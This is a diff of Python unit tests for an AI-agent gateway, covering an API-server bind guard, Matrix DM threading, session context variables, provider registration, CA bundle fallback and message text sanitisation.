# -- Network-accessible (should return True) --
|
||||
|
||||
def test_ipv4_wildcard(self):
|
||||
assert is_network_accessible("0.0.0.0") is True
|
||||
|
||||
def test_ipv6_wildcard(self):
|
||||
# This is the bypass vector that the string-based check missed.
|
||||
assert is_network_accessible("::") is True
|
||||
|
||||
def test_ipv4_mapped_unspecified(self):
|
||||
assert is_network_accessible("::ffff:0.0.0.0") is True
|
||||
|
||||
def test_private_ipv4(self):
|
||||
assert is_network_accessible("10.0.0.1") is True
|
||||
|
||||
def test_private_ipv4_class_c(self):
|
||||
assert is_network_accessible("192.168.1.1") is True
|
||||
|
||||
def test_public_ipv4(self):
|
||||
assert is_network_accessible("8.8.8.8") is True
|
||||
|
||||
# -- Hostname resolution --
|
||||
|
||||
def test_localhost_resolves_to_loopback(self):
|
||||
loopback_result = [
|
||||
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("127.0.0.1", 0)),
|
||||
]
|
||||
with patch("gateway.platforms.base._socket.getaddrinfo", return_value=loopback_result):
|
||||
assert is_network_accessible("localhost") is False
|
||||
|
||||
def test_hostname_resolving_to_non_loopback(self):
|
||||
non_loopback_result = [
|
||||
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("10.0.0.1", 0)),
|
||||
]
|
||||
with patch("gateway.platforms.base._socket.getaddrinfo", return_value=non_loopback_result):
|
||||
assert is_network_accessible("my-server.local") is True
|
||||
|
||||
def test_hostname_mixed_resolution(self):
|
||||
"""If a hostname resolves to both loopback and non-loopback, it's
|
||||
network-accessible (any non-loopback address is enough)."""
|
||||
mixed_result = [
|
||||
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("127.0.0.1", 0)),
|
||||
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("10.0.0.1", 0)),
|
||||
]
|
||||
with patch("gateway.platforms.base._socket.getaddrinfo", return_value=mixed_result):
|
||||
assert is_network_accessible("dual-host.local") is True
|
||||
|
||||
def test_dns_failure_fails_closed(self):
|
||||
"""Unresolvable hostnames should require an API key (fail closed)."""
|
||||
with patch(
|
||||
"gateway.platforms.base._socket.getaddrinfo",
|
||||
side_effect=socket.gaierror("Name resolution failed"),
|
||||
):
|
||||
assert is_network_accessible("nonexistent.invalid") is True
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Integration tests: connect() startup guard
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestConnectBindGuard:
|
||||
"""Verify that connect() refuses dangerous configurations."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_refuses_ipv4_wildcard_without_key(self):
|
||||
adapter = APIServerAdapter(PlatformConfig(enabled=True, extra={"host": "0.0.0.0"}))
|
||||
result = await adapter.connect()
|
||||
assert result is False
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_refuses_ipv6_wildcard_without_key(self):
|
||||
adapter = APIServerAdapter(PlatformConfig(enabled=True, extra={"host": "::"}))
|
||||
result = await adapter.connect()
|
||||
assert result is False
|
||||
|
||||
def test_allows_loopback_without_key(self):
|
||||
"""Loopback with no key should pass the guard."""
|
||||
adapter = APIServerAdapter(PlatformConfig(enabled=True, extra={"host": "127.0.0.1"}))
|
||||
assert adapter._api_key == ""
|
||||
# The guard condition: is_network_accessible(host) AND NOT api_key
|
||||
# For loopback, is_network_accessible is False so the guard does not block.
|
||||
assert is_network_accessible(adapter._host) is False
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_allows_wildcard_with_key(self):
|
||||
"""Non-loopback with a key should pass the guard."""
|
||||
adapter = APIServerAdapter(
|
||||
PlatformConfig(enabled=True, extra={"host": "0.0.0.0", "key": "sk-test"})
|
||||
)
|
||||
# The guard checks: is_network_accessible(host) AND NOT api_key
|
||||
# With a key set, the guard should not block.
|
||||
assert adapter._api_key == "sk-test"
|
||||
assert is_network_accessible("0.0.0.0") is True
|
||||
# Combined: the guard condition is False (key is set), so it passes
|
||||
@@ -436,6 +436,95 @@ class TestThreadPersistence:
|
||||
assert len(data) == 5
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# DM mention-thread feature
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_dm_mention_thread_disabled_by_default(monkeypatch):
|
||||
"""Default (dm_mention_threads=false): DM with mention should NOT create a thread."""
|
||||
monkeypatch.delenv("MATRIX_DM_MENTION_THREADS", raising=False)
|
||||
monkeypatch.setenv("MATRIX_AUTO_THREAD", "false")
|
||||
|
||||
adapter = _make_adapter()
|
||||
room = _make_room(member_count=2)
|
||||
event = _make_event("@hermes:example.org help me", event_id="$dm1")
|
||||
|
||||
await adapter._on_room_message(room, event)
|
||||
adapter.handle_message.assert_awaited_once()
|
||||
msg = adapter.handle_message.await_args.args[0]
|
||||
assert msg.source.thread_id is None
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_dm_mention_thread_creates_thread(monkeypatch):
|
||||
"""MATRIX_DM_MENTION_THREADS=true: DM with @mention creates a thread."""
|
||||
monkeypatch.setenv("MATRIX_DM_MENTION_THREADS", "true")
|
||||
monkeypatch.setenv("MATRIX_AUTO_THREAD", "false")
|
||||
|
||||
adapter = _make_adapter()
|
||||
room = _make_room(member_count=2)
|
||||
event = _make_event("@hermes:example.org help me", event_id="$dm1")
|
||||
|
||||
with patch.object(adapter, "_save_participated_threads"):
|
||||
await adapter._on_room_message(room, event)
|
||||
|
||||
adapter.handle_message.assert_awaited_once()
|
||||
msg = adapter.handle_message.await_args.args[0]
|
||||
assert msg.source.thread_id == "$dm1"
|
||||
assert msg.text == "help me"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_dm_mention_thread_no_mention_no_thread(monkeypatch):
|
||||
"""MATRIX_DM_MENTION_THREADS=true: DM without mention does NOT create a thread."""
|
||||
monkeypatch.setenv("MATRIX_DM_MENTION_THREADS", "true")
|
||||
monkeypatch.setenv("MATRIX_AUTO_THREAD", "false")
|
||||
|
||||
adapter = _make_adapter()
|
||||
room = _make_room(member_count=2)
|
||||
event = _make_event("hello without mention", event_id="$dm1")
|
||||
|
||||
await adapter._on_room_message(room, event)
|
||||
adapter.handle_message.assert_awaited_once()
|
||||
msg = adapter.handle_message.await_args.args[0]
|
||||
assert msg.source.thread_id is None
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_dm_mention_thread_preserves_existing_thread(monkeypatch):
|
||||
"""MATRIX_DM_MENTION_THREADS=true: DM already in a thread keeps that thread_id."""
|
||||
monkeypatch.setenv("MATRIX_DM_MENTION_THREADS", "true")
|
||||
monkeypatch.setenv("MATRIX_AUTO_THREAD", "false")
|
||||
|
||||
adapter = _make_adapter()
|
||||
adapter._bot_participated_threads.add("$existing_thread")
|
||||
room = _make_room(member_count=2)
|
||||
event = _make_event("@hermes:example.org help me", thread_id="$existing_thread")
|
||||
|
||||
await adapter._on_room_message(room, event)
|
||||
adapter.handle_message.assert_awaited_once()
|
||||
msg = adapter.handle_message.await_args.args[0]
|
||||
assert msg.source.thread_id == "$existing_thread"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_dm_mention_thread_tracks_participation(monkeypatch):
|
||||
"""DM mention-thread tracks the thread in _bot_participated_threads."""
|
||||
monkeypatch.setenv("MATRIX_DM_MENTION_THREADS", "true")
|
||||
monkeypatch.setenv("MATRIX_AUTO_THREAD", "false")
|
||||
|
||||
adapter = _make_adapter()
|
||||
room = _make_room(member_count=2)
|
||||
event = _make_event("@hermes:example.org help", event_id="$dm1")
|
||||
|
||||
with patch.object(adapter, "_save_participated_threads"):
|
||||
await adapter._on_room_message(room, event)
|
||||
|
||||
assert "$dm1" in adapter._bot_participated_threads
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# YAML config bridge
|
||||
# ---------------------------------------------------------------------------
|
||||
@@ -480,6 +569,25 @@ class TestMatrixConfigBridge:
|
||||
assert os.getenv("MATRIX_FREE_RESPONSE_ROOMS") == "!room1:example.org,!room2:example.org"
|
||||
assert os.getenv("MATRIX_AUTO_THREAD") == "false"
|
||||
|
||||
def test_yaml_bridge_sets_dm_mention_threads(self, monkeypatch, tmp_path):
|
||||
"""Matrix YAML dm_mention_threads should bridge to env var."""
|
||||
monkeypatch.delenv("MATRIX_DM_MENTION_THREADS", raising=False)
|
||||
|
||||
import os
|
||||
import yaml
|
||||
|
||||
yaml_content = {"matrix": {"dm_mention_threads": True}}
|
||||
config_file = tmp_path / "config.yaml"
|
||||
config_file.write_text(yaml.dump(yaml_content))
|
||||
|
||||
yaml_cfg = yaml.safe_load(config_file.read_text())
|
||||
matrix_cfg = yaml_cfg.get("matrix", {})
|
||||
if isinstance(matrix_cfg, dict):
|
||||
if "dm_mention_threads" in matrix_cfg and not os.getenv("MATRIX_DM_MENTION_THREADS"):
|
||||
monkeypatch.setenv("MATRIX_DM_MENTION_THREADS", str(matrix_cfg["dm_mention_threads"]).lower())
|
||||
|
||||
assert os.getenv("MATRIX_DM_MENTION_THREADS") == "true"
|
||||
|
||||
def test_env_vars_take_precedence_over_yaml(self, monkeypatch):
|
||||
"""Env vars should not be overwritten by YAML values."""
|
||||
monkeypatch.setenv("MATRIX_REQUIRE_MENTION", "true")
|
||||
|
||||
@@ -3,9 +3,15 @@ import os
|
||||
from gateway.config import Platform
|
||||
from gateway.run import GatewayRunner
|
||||
from gateway.session import SessionContext, SessionSource
|
||||
from gateway.session_context import (
|
||||
get_session_env,
|
||||
set_session_vars,
|
||||
clear_session_vars,
|
||||
)
|
||||
|
||||
|
||||
def test_set_session_env_includes_thread_id(monkeypatch):
|
||||
def test_set_session_env_sets_contextvars(monkeypatch):
|
||||
"""_set_session_env should populate contextvars, not os.environ."""
|
||||
runner = object.__new__(GatewayRunner)
|
||||
source = SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
@@ -21,25 +27,93 @@ def test_set_session_env_includes_thread_id(monkeypatch):
|
||||
monkeypatch.delenv("HERMES_SESSION_CHAT_NAME", raising=False)
|
||||
monkeypatch.delenv("HERMES_SESSION_THREAD_ID", raising=False)
|
||||
|
||||
runner._set_session_env(context)
|
||||
tokens = runner._set_session_env(context)
|
||||
|
||||
assert os.getenv("HERMES_SESSION_PLATFORM") == "telegram"
|
||||
assert os.getenv("HERMES_SESSION_CHAT_ID") == "-1001"
|
||||
assert os.getenv("HERMES_SESSION_CHAT_NAME") == "Group"
|
||||
assert os.getenv("HERMES_SESSION_THREAD_ID") == "17585"
|
||||
# Values should be readable via get_session_env (contextvar path)
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == "telegram"
|
||||
assert get_session_env("HERMES_SESSION_CHAT_ID") == "-1001"
|
||||
assert get_session_env("HERMES_SESSION_CHAT_NAME") == "Group"
|
||||
assert get_session_env("HERMES_SESSION_THREAD_ID") == "17585"
|
||||
|
||||
# os.environ should NOT be touched
|
||||
assert os.getenv("HERMES_SESSION_PLATFORM") is None
|
||||
assert os.getenv("HERMES_SESSION_THREAD_ID") is None
|
||||
|
||||
# Clean up
|
||||
runner._clear_session_env(tokens)
|
||||
|
||||
|
||||
def test_clear_session_env_removes_thread_id(monkeypatch):
|
||||
def test_clear_session_env_restores_previous_state(monkeypatch):
|
||||
"""_clear_session_env should restore contextvars to their pre-handler values."""
|
||||
runner = object.__new__(GatewayRunner)
|
||||
|
||||
monkeypatch.setenv("HERMES_SESSION_PLATFORM", "telegram")
|
||||
monkeypatch.setenv("HERMES_SESSION_CHAT_ID", "-1001")
|
||||
monkeypatch.setenv("HERMES_SESSION_CHAT_NAME", "Group")
|
||||
monkeypatch.setenv("HERMES_SESSION_THREAD_ID", "17585")
|
||||
monkeypatch.delenv("HERMES_SESSION_PLATFORM", raising=False)
|
||||
monkeypatch.delenv("HERMES_SESSION_CHAT_ID", raising=False)
|
||||
monkeypatch.delenv("HERMES_SESSION_CHAT_NAME", raising=False)
|
||||
monkeypatch.delenv("HERMES_SESSION_THREAD_ID", raising=False)
|
||||
|
||||
runner._clear_session_env()
|
||||
source = SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id="-1001",
|
||||
chat_name="Group",
|
||||
chat_type="group",
|
||||
thread_id="17585",
|
||||
)
|
||||
context = SessionContext(source=source, connected_platforms=[], home_channels={})
|
||||
|
||||
assert os.getenv("HERMES_SESSION_PLATFORM") is None
|
||||
assert os.getenv("HERMES_SESSION_CHAT_ID") is None
|
||||
assert os.getenv("HERMES_SESSION_CHAT_NAME") is None
|
||||
assert os.getenv("HERMES_SESSION_THREAD_ID") is None
|
||||
tokens = runner._set_session_env(context)
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == "telegram"
|
||||
|
||||
runner._clear_session_env(tokens)
|
||||
|
||||
# After clear, contextvars should return to defaults (empty)
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == ""
|
||||
assert get_session_env("HERMES_SESSION_CHAT_ID") == ""
|
||||
assert get_session_env("HERMES_SESSION_CHAT_NAME") == ""
|
||||
assert get_session_env("HERMES_SESSION_THREAD_ID") == ""
|
||||
|
||||
|
||||
def test_get_session_env_falls_back_to_os_environ(monkeypatch):
|
||||
"""get_session_env should fall back to os.environ when contextvar is unset."""
|
||||
monkeypatch.setenv("HERMES_SESSION_PLATFORM", "discord")
|
||||
|
||||
# No contextvar set — should read from os.environ
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == "discord"
|
||||
|
||||
# Now set a contextvar — should prefer it
|
||||
tokens = set_session_vars(platform="telegram")
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == "telegram"
|
||||
|
||||
# Restore — should fall back to os.environ again
|
||||
clear_session_vars(tokens)
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == "discord"
|
||||
|
||||
|
||||
def test_get_session_env_default_when_nothing_set(monkeypatch):
|
||||
"""get_session_env returns default when neither contextvar nor env is set."""
|
||||
monkeypatch.delenv("HERMES_SESSION_PLATFORM", raising=False)
|
||||
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == ""
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM", "fallback") == "fallback"
|
||||
|
||||
|
||||
def test_set_session_env_handles_missing_optional_fields():
|
||||
"""_set_session_env should handle None chat_name and thread_id gracefully."""
|
||||
runner = object.__new__(GatewayRunner)
|
||||
source = SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id="-1001",
|
||||
chat_name=None,
|
||||
chat_type="private",
|
||||
thread_id=None,
|
||||
)
|
||||
context = SessionContext(source=source, connected_platforms=[], home_channels={})
|
||||
|
||||
tokens = runner._set_session_env(context)
|
||||
|
||||
assert get_session_env("HERMES_SESSION_PLATFORM") == "telegram"
|
||||
assert get_session_env("HERMES_SESSION_CHAT_ID") == "-1001"
|
||||
assert get_session_env("HERMES_SESSION_CHAT_NAME") == ""
|
||||
assert get_session_env("HERMES_SESSION_THREAD_ID") == ""
|
||||
|
||||
runner._clear_session_env(tokens)
|
||||
|
||||
@@ -40,6 +40,7 @@ class TestProviderRegistry:
|
||||
("copilot", "GitHub Copilot", "api_key"),
|
||||
("huggingface", "Hugging Face", "api_key"),
|
||||
("zai", "Z.AI / GLM", "api_key"),
|
||||
("xai", "xAI", "api_key"),
|
||||
("kimi-coding", "Kimi / Moonshot", "api_key"),
|
||||
("minimax", "MiniMax", "api_key"),
|
||||
("minimax-cn", "MiniMax (China)", "api_key"),
|
||||
@@ -58,6 +59,12 @@ class TestProviderRegistry:
|
||||
assert pconfig.api_key_env_vars == ("GLM_API_KEY", "ZAI_API_KEY", "Z_AI_API_KEY")
|
||||
assert pconfig.base_url_env_var == "GLM_BASE_URL"
|
||||
|
||||
def test_xai_env_vars(self):
|
||||
pconfig = PROVIDER_REGISTRY["xai"]
|
||||
assert pconfig.api_key_env_vars == ("XAI_API_KEY",)
|
||||
assert pconfig.base_url_env_var == "XAI_BASE_URL"
|
||||
assert pconfig.inference_base_url == "https://api.x.ai/v1"
|
||||
|
||||
def test_copilot_env_vars(self):
|
||||
pconfig = PROVIDER_REGISTRY["copilot"]
|
||||
assert pconfig.api_key_env_vars == ("COPILOT_GITHUB_TOKEN", "GH_TOKEN", "GITHUB_TOKEN")
|
||||
|
||||
@@ -1,6 +1,7 @@
|
||||
"""Regression tests for Nous OAuth refresh + agent-key mint interactions."""
|
||||
|
||||
import json
|
||||
import os
|
||||
from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
|
||||
@@ -10,6 +11,80 @@ import pytest
|
||||
from hermes_cli.auth import AuthError, get_provider_auth_state, resolve_nous_runtime_credentials
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# _resolve_verify: CA bundle path validation
|
||||
# =============================================================================
|
||||
|
||||
|
||||
class TestResolveVerifyFallback:
|
||||
"""Verify _resolve_verify falls back to True when CA bundle path doesn't exist."""
|
||||
|
||||
def test_missing_ca_bundle_in_auth_state_falls_back(self):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
result = _resolve_verify(auth_state={
|
||||
"tls": {"insecure": False, "ca_bundle": "/nonexistent/ca-bundle.pem"},
|
||||
})
|
||||
assert result is True
|
||||
|
||||
def test_valid_ca_bundle_in_auth_state_is_returned(self, tmp_path):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
ca_file = tmp_path / "ca-bundle.pem"
|
||||
ca_file.write_text("fake cert")
|
||||
result = _resolve_verify(auth_state={
|
||||
"tls": {"insecure": False, "ca_bundle": str(ca_file)},
|
||||
})
|
||||
assert result == str(ca_file)
|
||||
|
||||
def test_missing_ssl_cert_file_env_falls_back(self, monkeypatch):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
monkeypatch.setenv("SSL_CERT_FILE", "/nonexistent/ssl-cert.pem")
|
||||
monkeypatch.delenv("HERMES_CA_BUNDLE", raising=False)
|
||||
result = _resolve_verify(auth_state={"tls": {}})
|
||||
assert result is True
|
||||
|
||||
def test_missing_hermes_ca_bundle_env_falls_back(self, monkeypatch):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
monkeypatch.setenv("HERMES_CA_BUNDLE", "/nonexistent/hermes-ca.pem")
|
||||
monkeypatch.delenv("SSL_CERT_FILE", raising=False)
|
||||
result = _resolve_verify(auth_state={"tls": {}})
|
||||
assert result is True
|
||||
|
||||
def test_insecure_takes_precedence_over_missing_ca(self):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
result = _resolve_verify(
|
||||
insecure=True,
|
||||
auth_state={"tls": {"ca_bundle": "/nonexistent/ca.pem"}},
|
||||
)
|
||||
assert result is False
|
||||
|
||||
def test_no_ca_bundle_returns_true(self, monkeypatch):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
monkeypatch.delenv("HERMES_CA_BUNDLE", raising=False)
|
||||
monkeypatch.delenv("SSL_CERT_FILE", raising=False)
|
||||
result = _resolve_verify(auth_state={"tls": {}})
|
||||
assert result is True
|
||||
|
||||
def test_explicit_ca_bundle_param_missing_falls_back(self):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
result = _resolve_verify(ca_bundle="/nonexistent/explicit-ca.pem")
|
||||
assert result is True
|
||||
|
||||
def test_explicit_ca_bundle_param_valid_is_returned(self, tmp_path):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
ca_file = tmp_path / "explicit-ca.pem"
|
||||
ca_file.write_text("fake cert")
|
||||
result = _resolve_verify(ca_bundle=str(ca_file))
|
||||
assert result == str(ca_file)
|
||||
|
||||
|
||||
def _setup_nous_auth(
|
||||
hermes_home: Path,
|
||||
*,
|
||||
|
||||
@@ -0,0 +1,83 @@
|
||||
"""Test that overlay providers with mismatched models.dev keys resolve correctly.
|
||||
|
||||
HERMES_OVERLAYS keys may be models.dev IDs (e.g. "github-copilot") while
|
||||
_PROVIDER_MODELS and config.yaml use Hermes IDs ("copilot"). The slug
|
||||
resolution in list_authenticated_providers() Section 2 must bridge this gap.
|
||||
|
||||
Covers: #5223, #6492
|
||||
"""
|
||||
|
||||
import json
|
||||
import os
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
from hermes_cli.model_switch import list_authenticated_providers
|
||||
|
||||
|
||||
# -- Copilot slug resolution (env var path) ----------------------------------
|
||||
|
||||
@patch.dict(os.environ, {"COPILOT_GITHUB_TOKEN": "fake-ghu"}, clear=False)
|
||||
def test_copilot_uses_hermes_slug():
|
||||
"""github-copilot overlay should resolve to slug='copilot' with curated models."""
|
||||
providers = list_authenticated_providers(current_provider="copilot")
|
||||
|
||||
copilot = next((p for p in providers if p["slug"] == "copilot"), None)
|
||||
assert copilot is not None, "copilot should appear when COPILOT_GITHUB_TOKEN is set"
|
||||
assert copilot["total_models"] > 0, "copilot should have curated models"
|
||||
assert copilot["is_current"] is True
|
||||
|
||||
# Must NOT appear under the models.dev key
|
||||
gh_copilot = next((p for p in providers if p["slug"] == "github-copilot"), None)
|
||||
assert gh_copilot is None, "github-copilot slug should not appear (resolved to copilot)"
|
||||
|
||||
|
||||
@patch.dict(os.environ, {"COPILOT_GITHUB_TOKEN": "fake-ghu"}, clear=False)
|
||||
def test_copilot_no_duplicate_entries():
|
||||
"""Copilot must appear only once — not as both 'copilot' (section 1) and 'github-copilot' (section 2)."""
|
||||
providers = list_authenticated_providers(current_provider="copilot")
|
||||
|
||||
copilot_slugs = [p["slug"] for p in providers if "copilot" in p["slug"]]
|
||||
# Should have at most one copilot entry (may also have copilot-acp if creds exist)
|
||||
copilot_main = [s for s in copilot_slugs if s == "copilot"]
|
||||
assert len(copilot_main) == 1, f"Expected exactly one 'copilot' entry, got {copilot_main}"
|
||||
|
||||
|
||||
# -- kimi-for-coding alias in auth.py ----------------------------------------
|
||||
|
||||
def test_kimi_for_coding_alias():
|
||||
"""resolve_provider('kimi-for-coding') should return 'kimi-coding'."""
|
||||
from hermes_cli.auth import resolve_provider
|
||||
|
||||
result = resolve_provider("kimi-for-coding")
|
||||
assert result == "kimi-coding"
|
||||
|
||||
|
||||
# -- Generic slug mismatch providers -----------------------------------------
|
||||
|
||||
@patch.dict(os.environ, {"KIMI_API_KEY": "fake-key"}, clear=False)
|
||||
def test_kimi_for_coding_overlay_uses_hermes_slug():
|
||||
"""kimi-for-coding overlay should resolve to slug='kimi-coding'."""
|
||||
providers = list_authenticated_providers(current_provider="kimi-coding")
|
||||
|
||||
kimi = next((p for p in providers if p["slug"] == "kimi-coding"), None)
|
||||
assert kimi is not None, "kimi-coding should appear when KIMI_API_KEY is set"
|
||||
assert kimi["is_current"] is True
|
||||
|
||||
# Must NOT appear under the models.dev key
|
||||
kimi_mdev = next((p for p in providers if p["slug"] == "kimi-for-coding"), None)
|
||||
assert kimi_mdev is None, "kimi-for-coding slug should not appear (resolved to kimi-coding)"
|
||||
|
||||
|
||||
@patch.dict(os.environ, {"KILOCODE_API_KEY": "fake-key"}, clear=False)
|
||||
def test_kilo_overlay_uses_hermes_slug():
|
||||
"""kilo overlay should resolve to slug='kilocode'."""
|
||||
providers = list_authenticated_providers(current_provider="kilocode")
|
||||
|
||||
kilo = next((p for p in providers if p["slug"] == "kilocode"), None)
|
||||
assert kilo is not None, "kilocode should appear when KILOCODE_API_KEY is set"
|
||||
assert kilo["is_current"] is True
|
||||
|
||||
kilo_mdev = next((p for p in providers if p["slug"] == "kilo"), None)
|
||||
assert kilo_mdev is None, "kilo slug should not appear (resolved to kilocode)"
|
||||
@@ -9,7 +9,9 @@ Covers three static methods on AIAgent (inspired by PR #1321 — @alireza78a):
|
||||
import types
|
||||
|
||||
from run_agent import AIAgent
|
||||
from tools.delegate_tool import MAX_CONCURRENT_CHILDREN
|
||||
from tools.delegate_tool import _get_max_concurrent_children
|
||||
|
||||
MAX_CONCURRENT_CHILDREN = _get_max_concurrent_children()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@@ -2125,6 +2125,28 @@ class TestRetryExhaustion:
|
||||
assert "error" in result
|
||||
assert "rate limited" in result["error"]
|
||||
|
||||
def test_build_api_kwargs_error_no_unbound_local(self, agent):
|
||||
"""When _build_api_kwargs raises, except handler must not crash with UnboundLocalError.
|
||||
|
||||
Regression: _dump_api_request_debug(api_kwargs, ...) in the except block
|
||||
referenced api_kwargs before it was assigned when _build_api_kwargs threw.
|
||||
"""
|
||||
self._setup_agent(agent)
|
||||
with (
|
||||
patch.object(agent, "_build_api_kwargs", side_effect=ValueError("bad messages")),
|
||||
patch.object(agent, "_persist_session"),
|
||||
patch.object(agent, "_save_trajectory"),
|
||||
patch.object(agent, "_cleanup_task_resources"),
|
||||
patch("run_agent.time", self._make_fast_time_mock()),
|
||||
):
|
||||
result = agent.run_conversation("hello")
|
||||
# Must surface the real error, not UnboundLocalError
|
||||
assert result.get("completed") is False
|
||||
assert result.get("failed") is True
|
||||
assert "error" in result
|
||||
assert "UnboundLocalError" not in result.get("error", "")
|
||||
assert "bad messages" in result["error"]
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Flush sentinel leak
|
||||
|
||||
@@ -0,0 +1,140 @@
|
||||
"""Tests for UnicodeEncodeError recovery with ASCII codec.
|
||||
|
||||
Covers the fix for issue #6843 — systems with ASCII locale (LANG=C)
|
||||
that can't encode non-ASCII characters in API request payloads.
|
||||
"""
|
||||
|
||||
import pytest
|
||||
|
||||
from run_agent import (
|
||||
_strip_non_ascii,
|
||||
_sanitize_messages_non_ascii,
|
||||
_sanitize_messages_surrogates,
|
||||
)
|
||||
|
||||
|
||||
class TestStripNonAscii:
|
||||
"""Tests for _strip_non_ascii helper."""
|
||||
|
||||
def test_ascii_only(self):
|
||||
assert _strip_non_ascii("hello world") == "hello world"
|
||||
|
||||
def test_removes_non_ascii(self):
|
||||
assert _strip_non_ascii("hello ⚕ world") == "hello world"
|
||||
|
||||
def test_removes_emoji(self):
|
||||
assert _strip_non_ascii("test 🤖 done") == "test done"
|
||||
|
||||
def test_chinese_chars(self):
|
||||
assert _strip_non_ascii("你好world") == "world"
|
||||
|
||||
def test_empty_string(self):
|
||||
assert _strip_non_ascii("") == ""
|
||||
|
||||
def test_only_non_ascii(self):
|
||||
assert _strip_non_ascii("⚕🤖") == ""
|
||||
|
||||
|
||||
class TestSanitizeMessagesNonAscii:
|
||||
"""Tests for _sanitize_messages_non_ascii."""
|
||||
|
||||
def test_no_change_ascii_only(self):
|
||||
messages = [{"role": "user", "content": "hello"}]
|
||||
assert _sanitize_messages_non_ascii(messages) is False
|
||||
assert messages[0]["content"] == "hello"
|
||||
|
||||
def test_sanitizes_content_string(self):
|
||||
messages = [{"role": "user", "content": "hello ⚕ world"}]
|
||||
assert _sanitize_messages_non_ascii(messages) is True
|
||||
assert messages[0]["content"] == "hello world"
|
||||
|
||||
def test_sanitizes_content_list(self):
|
||||
messages = [{
|
||||
"role": "user",
|
||||
"content": [{"type": "text", "text": "hello 🤖"}]
|
||||
}]
|
||||
assert _sanitize_messages_non_ascii(messages) is True
|
||||
assert messages[0]["content"][0]["text"] == "hello "
|
||||
|
||||
def test_sanitizes_name_field(self):
|
||||
messages = [{"role": "tool", "name": "⚕tool", "content": "ok"}]
|
||||
assert _sanitize_messages_non_ascii(messages) is True
|
||||
assert messages[0]["name"] == "tool"
|
||||
|
||||
def test_sanitizes_tool_calls(self):
|
||||
messages = [{
|
||||
"role": "assistant",
|
||||
"content": None,
|
||||
"tool_calls": [{
|
||||
"id": "call_1",
|
||||
"type": "function",
|
||||
"function": {
|
||||
"name": "read_file",
|
||||
"arguments": '{"path": "⚕test.txt"}'
|
||||
}
|
||||
}]
|
||||
}]
|
||||
assert _sanitize_messages_non_ascii(messages) is True
|
||||
assert messages[0]["tool_calls"][0]["function"]["arguments"] == '{"path": "test.txt"}'
|
||||
|
||||
def test_handles_non_dict_messages(self):
|
||||
messages = ["not a dict", {"role": "user", "content": "hello"}]
|
||||
assert _sanitize_messages_non_ascii(messages) is False
|
||||
|
||||
def test_empty_messages(self):
|
||||
assert _sanitize_messages_non_ascii([]) is False
|
||||
|
||||
def test_multiple_messages(self):
|
||||
messages = [
|
||||
{"role": "system", "content": "⚕ System prompt"},
|
||||
{"role": "user", "content": "Hello 你好"},
|
||||
{"role": "assistant", "content": "Hi there!"},
|
||||
]
|
||||
assert _sanitize_messages_non_ascii(messages) is True
|
||||
assert messages[0]["content"] == " System prompt"
|
||||
assert messages[1]["content"] == "Hello "
|
||||
assert messages[2]["content"] == "Hi there!"
|
||||
|
||||
|
||||
class TestSurrogateVsAsciiSanitization:
|
||||
"""Test that surrogate and ASCII sanitization work independently."""
|
||||
|
||||
def test_surrogates_still_handled(self):
|
||||
"""Surrogates are caught by _sanitize_messages_surrogates, not _non_ascii."""
|
||||
msg_with_surrogate = "test \ud800 end"
|
||||
messages = [{"role": "user", "content": msg_with_surrogate}]
|
||||
assert _sanitize_messages_surrogates(messages) is True
|
||||
assert "\ud800" not in messages[0]["content"]
|
||||
assert "\ufffd" in messages[0]["content"]
|
||||
|
||||
def test_surrogates_in_name_and_tool_calls_are_sanitized(self):
|
||||
messages = [{
|
||||
"role": "assistant",
|
||||
"name": "bad\ud800name",
|
||||
"content": None,
|
||||
"tool_calls": [{
|
||||
"id": "call_\ud800",
|
||||
"type": "function",
|
||||
"function": {
|
||||
"name": "read\ud800_file",
|
||||
"arguments": '{"path": "bad\ud800.txt"}'
|
||||
}
|
||||
}],
|
||||
}]
|
||||
assert _sanitize_messages_surrogates(messages) is True
|
||||
assert "\ud800" not in messages[0]["name"]
|
||||
assert "\ud800" not in messages[0]["tool_calls"][0]["id"]
|
||||
assert "\ud800" not in messages[0]["tool_calls"][0]["function"]["name"]
|
||||
